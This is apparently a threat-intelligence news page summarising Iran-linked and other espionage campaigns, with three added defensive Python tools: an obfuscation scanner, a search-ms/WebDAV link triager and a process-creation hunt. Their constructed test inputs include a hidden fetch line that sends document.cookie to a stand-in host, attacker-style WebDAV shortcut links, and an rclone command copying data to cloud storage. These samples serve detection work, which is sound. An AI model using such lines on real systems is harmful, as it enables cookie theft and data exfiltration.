Iranian State-Linked Threat Activity and Related Supply-Chain/Developer Targeting Research
Multiple reports detail Iranian-linked espionage activity and tooling updates. SafeBreach published follow-on findings on the Iranian state-sponsored actor “Prince of Persia”, including at least three active variants of the Foudre and Tonnerre malware families, newly identified C2 infrastructure, and a Telegram-based data exfiltration channel. After publication the actor rapidly rotated C2 servers and Telegram accounts, attempted to obscure victim-tracking artifacts, and appeared to attempt retaliation against the researchers in a manner resembling its earlier attacks on open-source Python libraries.
Separately, Plone (a Python-based CMS) reported that it had prevented a supply-chain compromise: an attacker used a stolen developer GitHub personal access token to force-push whitespace-obfuscated malicious JavaScript into multiple repositories, and the changes were detected before any official release. GitHub assessed that the payload was aimed at other developers, with persistence via shell startup scripts, remote code execution, and theft of credentials, API keys, browser profiles, and cryptocurrency wallet files. Two checks follow directly from the incident: a force-push that rewrites history on a release branch should be blocked, or at least alerted on, by branch protection, and a diff whose payload sits behind long runs of whitespace is not caught by eye, only by scanning the raw bytes.

Additional Iranian activity was reported in an espionage campaign attributed to APT42 (IRGC-linked) using TAMECAT, a modular, largely in-memory PowerShell backdoor delivered after prolonged social engineering (for example, rapport-building over WhatsApp), with modules for browser data theft, screenshots, and file discovery. Separate research on the Lazarus “Contagious Interview” campaign (fake job interviews and AnyDesk RAT backdoors) is unrelated to the Iranian-focused activity described elsewhere.
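As an added example (not Plone's or GitHub's own tooling), the scanner below looks for the kind of whitespace obfuscation described in the Plone incident above: a payload pushed off-screen behind a long run of spaces, tab/space-encoded lines that render as blank, and invisible Unicode code points inside string literals. The thresholds, the code-point list and the sample input are constructed assumptions for the example; run it over the raw files of a suspicious push rather than over a rendered diff, which is exactly where this trick hides.

```python
"""Scan JavaScript source for whitespace / invisible-character obfuscation.

Added example, not Plone's or GitHub's tooling. The sample input is constructed
and the thresholds are assumptions a reviewer would tune for the code base.
"""
import re
import sys

# Code points that render as blank or nothing and can hide code inside a string.
INVISIBLE = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
    "\u00ad": "SOFT HYPHEN",
    "\u115f": "HANGUL CHOSEONG FILLER",
    "\u1160": "HANGUL JUNGSEONG FILLER",
    "\u3164": "HANGUL FILLER",
}
MAX_WS_RUN = 16      # longest run of spaces/tabs tolerated inside a line of code
MAX_BLANK_LEN = 8    # a "blank" line longer than this is carrying something
MAX_LINE_LEN = 2000  # minified bundles aside, a source line this long hides content off-screen
WS_RUN = re.compile(r"[ \t]{%d,}" % (MAX_WS_RUN + 1))


def scan_js(text):
    """Return [(line_number, reason), ...] for lines that look obfuscated."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        body = line.lstrip(" \t")
        indent = len(line) - len(body)
        if body == "":
            # Indentation with nothing after it: only suspicious when it is long.
            if indent > MAX_BLANK_LEN:
                findings.append((lineno, "whitespace-only line carrying %d chars" % indent))
            continue
        for m in WS_RUN.finditer(body):
            col = indent + m.start() + 1
            findings.append((lineno, "run of %d whitespace chars at column %d" % (len(m.group()), col)))
        for ch in sorted(set(line)):
            if ch in INVISIBLE:
                findings.append((lineno, "invisible code point U+%04X (%s)" % (ord(ch), INVISIBLE[ch])))
        if len(line) > MAX_LINE_LEN:
            findings.append((lineno, "line length %d" % len(line)))
    return findings


# Constructed sample: a clean function, then a line whose payload sits past 300
# spaces (off-screen in most diff viewers), a tab/space-encoded "blank" line, and a
# string padded with Hangul filler characters.
SAMPLE = (
    "export function init() {\n"
    "  return true;\n"
    "}" + " " * 300 + 'fetch("https://example.invalid/c", {method: "POST", body: document.cookie});\n'
    + "\t \t" * 8 + "\n"
    + 'const k = "ab\u3164\u3164cd";\n'
)


def scan_paths(paths):
    """Scan the files given on the command line; returns {path: findings}."""
    out = {}
    for p in paths:
        with open(p, encoding="utf-8", errors="replace") as fh:
            out[p] = scan_js(fh.read())
    return out


if __name__ == "__main__":
    results = scan_paths(sys.argv[1:]) if len(sys.argv) > 1 else {"<sample>": scan_js(SAMPLE)}
    for path, findings in results.items():
        for lineno, reason in findings:
            print("%s:%d: %s" % (path, lineno, reason))
```

Run it as `python scan_ws.py $(git diff --name-only HEAD~1 -- '*.js')` after a suspicious push; the three sample lines each produce one finding, and the clean lines produce none. Minified bundles will trip the line-length rule, so exempt build output directories or raise the threshold for them.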

Iranian Threat Activity: RedKitten NGO Targeting and APT42 TAMECAT Credential Theft
Reporting describes two separate **Iran-linked espionage** efforts. HarfangLab detailed a campaign dubbed **RedKitten** targeting human-rights NGOs and individuals documenting abuses, using a lure delivered as a Farsi-named `7z` archive containing macro-enabled Excel (`.xlsm`) files. When victims enable the malicious VBA, it drops a C# implant (`AppVStreamingUX_Multi_User.dll`) via **AppDomainManager injection**; the operation uses **GitHub** and **Google Drive** for configuration/payload retrieval and **Telegram** for command-and-control, and researchers noted code characteristics consistent with **LLM-assisted** development. Separately, Pulsedive research (as summarized) attributed a PowerShell backdoor called **TAMECAT** to **APT42**, describing social-engineering via impersonated WhatsApp contacts and links abusing the `search-ms` URI handler, followed by VBScript-based staging and delivery mechanisms including WebDAV-hosted LNKs disguised as PDFs. TAMECAT was reported to steal credentials from **Microsoft Edge** and **Chrome**, establish persistence (e.g., logon scripts and registry run keys), and use multiple C2 channels (including **Telegram**, Discord, Firebase, and Cloudflare Workers). Other items in the set cover unrelated events: a supply-chain compromise of *eScan* antivirus update infrastructure distributing a backdoor, and Fortinet’s reporting on **Interlock** ransomware activity affecting primarily UK/US organizations (not Iran-linked).
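One way to triage links pulled from a suspect message for the `search-ms` and WebDAV delivery chain described above (an added example, not HarfangLab's, Pulsedive's or any vendor's code): parse the `search-ms:` parameters, flag a `crumb=location:` that points at a remote UNC or WebDAV share, flag a `displayname` that impersonates a local folder, and flag shortcut files hiding behind a document extension. The same checks cover the URL/LNK-over-WebDAV phishing that Cofense reported, summarized further down this page. The tag names, the local-folder list and the sample links are assumptions constructed for the example.

```python
"""Triage links for the search-ms / WebDAV / disguised-LNK delivery chain.

Added example, not from HarfangLab, Pulsedive or F5 reporting. Tag names, the
folder-name list and the sample links are this example's own assumptions.
"""
import re
from urllib.parse import parse_qs, urlparse

# Explorer shows `displayname` as the window title; these names make a remote
# share look like a local folder (assumed spoof list).
LOCAL_FOLDER_NAMES = {"downloads", "documents", "desktop", "onedrive"}
# report.pdf.lnk, invoice.docx.url and similar double extensions.
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?|txt)\.(?:lnk|url)$", re.I)


def _basename(path):
    return re.split(r"[\\/]", path.split("?", 1)[0])[-1]


def _check_unc(loc, tags):
    """Tag a \\\\host\\share location; '@SSL'/'@port' hosts and DavWWWRoot mean WebDAV."""
    if loc.startswith("\\\\"):
        tags.add("REMOTE_UNC")
        host = loc[2:].split("\\", 1)[0]
        if "@" in host or "davwwwroot" in loc.lower():
            tags.add("WEBDAV")


def classify_link(link):
    """Return the set of tags that apply to one link (empty set = nothing notable)."""
    tags = set()
    s = link.strip()
    low = s.lower()
    remote = False
    target = s
    if low.startswith("search-ms:"):
        # search-ms:query=<text>&crumb=location:<path>&displayname=<window title>
        tags.add("SEARCH_MS")
        params = parse_qs(s[len("search-ms:"):], keep_blank_values=True)
        for crumb in params.get("crumb", []):
            if crumb.lower().startswith("location:"):
                target = crumb[len("location:"):]
                _check_unc(target, tags)
                remote = "REMOTE_UNC" in tags
        for name in params.get("displayname", []):
            if name.strip().lower() in LOCAL_FOLDER_NAMES:
                tags.add("DISPLAYNAME_SPOOF")
    elif low.startswith("\\\\"):
        _check_unc(s, tags)
        remote = True
    elif low.startswith(("http://", "https://")):
        target = urlparse(s).path
        remote = True
    name = _basename(target)
    if DOUBLE_EXT.search(name):
        tags.add("LNK_DOUBLE_EXT")
    if remote and name.lower().endswith((".lnk", ".url")):
        tags.add("REMOTE_SHORTCUT")
    return tags


def triage(links):
    """Return [(link, tags)] for links that raised at least one tag."""
    out = []
    for link in links:
        tags = classify_link(link)
        if tags:
            out.append((link, tags))
    return out


# Constructed sample links (documentation addresses, not real infrastructure).
SAMPLE_LINKS = [
    r"search-ms:query=invoice&crumb=location:\\203.0.113.10@SSL\DavWWWRoot\share&displayname=Downloads",
    "https://files.example.invalid/dav/report.pdf.lnk",
    "https://www.example.invalid/docs/report.pdf",
    r"\\203.0.113.10@80\DavWWWRoot\brief.pdf.lnk",
]

if __name__ == "__main__":
    for link, tags in triage(SAMPLE_LINKS):
        print(sorted(tags), link)
```

The first sample link is the shape that matters most: a `search-ms:` URI whose crumb opens an attacker's WebDAV share inside an Explorer window titled "Downloads", so the `.pdf.lnk` the victim then double-clicks looks like a local file. Feed `triage()` every link extracted from a message body or HTML attachment; a hit on `SEARCH_MS` plus `REMOTE_UNC` is worth blocking outright at the mail gateway.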
1 month ago
Iran-Linked Cyber Activity Escalates Amid Middle East Conflict
Iran-nexus cyber activity intensified alongside regional military escalation, with multiple reporting streams describing both opportunistic and targeted operations. Check Point Research observed a coordinated campaign to compromise internet-connected **IP cameras** across Israel, the UAE, Qatar, Bahrain, Kuwait, Lebanon, and Cyprus, with spikes in exploitation attempts aligned with geopolitical events; the activity was traced to infrastructure linked to Iran-nexus actors, who used commercial VPN exit nodes (e.g., *Mullvad*, *ProtonVPN*, *Surfshark*, *NordVPN*) and VPS infrastructure to mask their origin, and the most targeted vendors were **Hikvision** and **Dahua**.

Separately, Symantec reported **Seedworm** (*MuddyWater/Temp Zagros/Static Kitten*) activity against multiple U.S. and Canadian organizations beginning in February 2026, including a U.S. bank, an airport, a non-profit, and the Israeli operations of a U.S. software supplier to the defense and aerospace sector. Symantec identified a previously unknown backdoor dubbed **Dindoor** (using the *Deno* runtime) and a Python backdoor, **Fakeset**; the malware was signed with certificates issued to “**Amy Cherne**” (and in some cases “**Donald Gay**”), and the actor attempted data exfiltration with **Rclone** to a *Wasabi* cloud storage bucket.

Additional coverage indicates broader pro-Iranian cyber activity but is less specific to the above intrusions. ASEC’s weekly “Ransom & Dark Web Issues” roundup flags **pro-Iranian/pro-Islamist hacktivist** attacks against Middle Eastern and pro-Western targets, but provides limited technical detail in the excerpt.
A podcast episode describing “Iran’s 12 days of cyber war” and global OT targeting (including *Unitronics* PLCs) is largely commentary and retrospective framing rather than a discrete, verifiable incident report, and two other items in the set (a Russia-linked **APT28** phishing/malware campaign in Ukraine and a China-nexus **UAT-9244** telecom intrusion set in South America) describe unrelated threat activity outside the Iran-focused escalation.
6 days ago
Multiple APT and malware campaigns abusing phishing, cloud services, and signed binaries
Reporting across multiple research teams described a surge of distinct, ongoing intrusion campaigns rather than a single unified incident. **Check Point** reported on **Silver Dragon**, a Chinese-aligned activity cluster assessed as operating under the broader **APT41** umbrella, targeting organizations in **Southeast Asia and Europe** (notably government) via exploitation of public-facing servers and phishing, then deploying **Cobalt Strike**, **DNS tunneling**, and a new Google Drive–based backdoor (**GearDoor**) alongside custom tools (**SSHcmd** and **SliverScreen**) for remote access and screen capture. **Microsoft** detailed separate February 2026 phishing campaigns by an unknown actor that used meeting/invoice-style lures and **EV code-signed** malware (certificate issued to **TrustConnect Software PTY LTD**) masquerading as common workplace apps (e.g., `msteams.exe`, `adobereader.exe`, `zoomworkspace.clientsetup.exe`) to install legitimate **RMM** tooling (**ScreenConnect**, **Tactical RMM**, **Mesh Agent**) for persistent access and lateral movement. Other reporting highlighted additional, unrelated campaigns and tradecraft: **ClearSky** described a Russian-aligned operation targeting **Ukraine** using a phishing-delivered ZIP/HTA chain that drops a .NET loader (**BadPaw**) and backdoor (**MeowMeow**) with **.NET Reactor** obfuscation, parameter-gated execution, and sandbox/tooling checks (with low-confidence linkage to **APT28**). **Cofense**-reported activity (via SC Media) showed phishing that weaponizes **Windows File Explorer + WebDAV** using URL/LNK shortcuts to pull payloads (notably **AsyncRAT**, **XWorm**, **DcRAT**) and infrastructure including **Cloudflare Tunnel** domains hosting WebDAV servers. 
**Cisco Talos**-reported **Dohdoor** activity (UAT-10027) targeted US **education and healthcare**, using a PowerShell→batch→DLL sideloading chain via legitimate executables (e.g., `Fondue.exe`, `mblctr.exe`, `ScreenClippingHost.exe`) and **DNS-over-HTTPS** to Cloudflare for C2 discovery and tunneling. Separately, **Zscaler** reported **ScarCruft**’s *Ruby Jumper* campaign using **Zoho WorkDrive** for C2 and removable-media components to reach air-gapped systems, while another Zscaler report analyzed **Dust Specter** targeting Iraqi government officials with password-protected RAR delivery and modular implants. **Qianxin XLab** assessed that the sanctioned infrastructure provider **Funnull** had resurfaced to support scam/criminal supply chains and potential **MacCMS**-related supply-chain activity, and **F5 Labs** summarized **APT42**’s **TAMECAT** PowerShell backdoor focused on Edge/Chrome credential theft with C2 over Telegram/Discord/HTTPS and specific file/hash indicators. (A separate Help Net Security item on a Microsoft Defender onboarding tool is product/administrative news and not part of the threat-campaign reporting.)
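The Seedworm activity in the previous entry and the masquerade, sideloading and RMM tradecraft in this one reduce to a handful of process-creation hunts: a well-known application name carrying the wrong publisher (the EV-signed `msteams.exe`), a certificate subject on a watchlist (the names Symantec and Microsoft reported), a Windows sideload host such as `Fondue.exe` running outside `C:\Windows`, an RMM installer spawned by something in a user-writable path, and `rclone` pushing data to Wasabi. The block below is an added example, not a vendor rule or any researcher's code. The records are constructed, EDR-style dicts; the expected-publisher strings, path prefixes and tag names are this example's assumptions, and only the certificate subjects and file names come from the reporting.

```python
"""Hunt process-creation records for the tradecraft described in the entries above.

Added example, not a vendor rule. Records are constructed dicts shaped like an
EDR process event; expected-publisher strings, path lists and tag names are
this example's assumptions. Certificate subjects and file names come from the page.
"""
import re

# Lure file names reported beside the publisher string a genuine copy would carry (assumed).
EXPECTED_PUBLISHER = {
    "msteams.exe": "microsoft",
    "adobereader.exe": "adobe",
    "zoomworkspace.clientsetup.exe": "zoom",
}
# Certificate subjects named in the Symantec and Microsoft reporting, used as a plain watchlist.
SIGNER_WATCHLIST = {"trustconnect software pty ltd", "amy cherne", "donald gay"}
# Legitimate Windows binaries the Dohdoor reporting names as DLL sideload hosts.
SIDELOAD_HOSTS = {"fondue.exe", "mblctr.exe", "screenclippinghost.exe"}
RMM_AGENT = re.compile(r"screenconnect|tactical[-_ ]?rmm|meshagent", re.I)
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
WINDOWS_DIR = "c:\\windows\\"
RCLONE_VERB = re.compile(r"\b(copy|copyto|sync|move)\b")


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the set of tags that fire on one process-creation record."""
    tags = set()
    image = ev.get("image", "")
    name = _base(image)
    low = image.lower()
    signer = ev.get("signer", "").lower()
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmdline", "").lower()

    expected = EXPECTED_PUBLISHER.get(name)
    if expected and expected not in signer:
        tags.add("MASQUERADE")            # well-known app name, wrong publisher on the signature
    if any(w in signer for w in SIGNER_WATCHLIST):
        tags.add("SUSPECT_SIGNER")
    if name in SIDELOAD_HOSTS and not low.startswith(WINDOWS_DIR):
        tags.add("SIDELOAD_HOST")         # system binary copied next to a planted DLL
    if RMM_AGENT.search(name) and parent.startswith(USER_WRITABLE):
        tags.add("RMM_FROM_USER_DIR")     # RMM installer launched by something in a user path
    if name == "rclone.exe" and RCLONE_VERB.search(cmd):
        tags.add("RCLONE_TRANSFER")
        if "wasabi" in cmd:
            tags.add("WASABI_DESTINATION")
    return tags


def hunt(events):
    """Return [(index, tags)] for records that raised at least one tag."""
    out = []
    for i, ev in enumerate(events):
        tags = evaluate(ev)
        if tags:
            out.append((i, tags))
    return out


# Constructed records (not real telemetry).
EVENTS = [
    {"image": r"C:\Users\alice\Downloads\msteams.exe", "signer": "TrustConnect Software PTY LTD",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "msteams.exe"},
    {"image": r"C:\Windows\System32\Fondue.exe", "signer": "Microsoft Windows",
     "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "fondue.exe"},
    {"image": r"C:\Users\Public\Fondue.exe", "signer": "Microsoft Windows",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "Fondue.exe"},
    {"image": r"C:\Users\alice\AppData\Local\Temp\rclone.exe", "signer": "",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"rclone.exe copy C:\Finance wasabi:bucket-a --s3-endpoint s3.wasabisys.com"},
    {"image": r"C:\Users\alice\AppData\Local\Temp\ScreenConnect.ClientSetup.exe", "signer": "ConnectWise, LLC",
     "parent": r"C:\Users\alice\Downloads\msteams.exe", "cmdline": "ScreenConnect.ClientSetup.exe"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "signer": "Google LLC",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "chrome.exe"},
]

if __name__ == "__main__":
    for i, tags in hunt(EVENTS):
        print(i, EVENTS[i]["image"], sorted(tags))
```

The signer check is deliberately a substring match on the certificate subject rather than a validity check: the `msteams.exe` in the Microsoft report carried a valid EV signature, so "is the signature valid" is the wrong question and "is the signer the one this file name implies" is the right one. The `SIDELOAD_HOST` rule keys on location only; legitimate copies of those binaries live under `C:\Windows`, so one running from `C:\Users\Public` is worth a look even before the planted DLL is found.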
1 week ago